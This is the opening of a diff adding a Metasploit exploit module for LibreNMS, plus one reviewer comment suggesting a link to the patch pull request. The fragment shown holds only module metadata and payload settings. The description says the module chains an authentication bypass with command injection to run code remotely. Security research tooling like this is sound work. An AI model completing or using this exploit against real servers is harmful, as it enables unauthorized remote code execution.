modules/exploits/multi/http/librenms_rce.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS RCE',
+      'Description'    => %q{
+				This module exploit an auth-bypass in LibreNMS to get admin privileges,
+				and then executes code via a command injection.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'blotus',   # original discovery
+          'bui',      # original discovery
+          'jvoisin',  # original discovery and metasploit module
+				],
+				'Payload'        =>
+				{
+					'Compat' => {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic telnet perl ruby python',
+					},
+					'DisableNops' => true,
+					'BadChars' => "\x20&#",
+				},
+      'References'     => [ ],
```

Comment:
The `References` array can be used to mention the PR patch URL `https://github.com/librenms/librenms/pull/7511` and any other relevant URLs.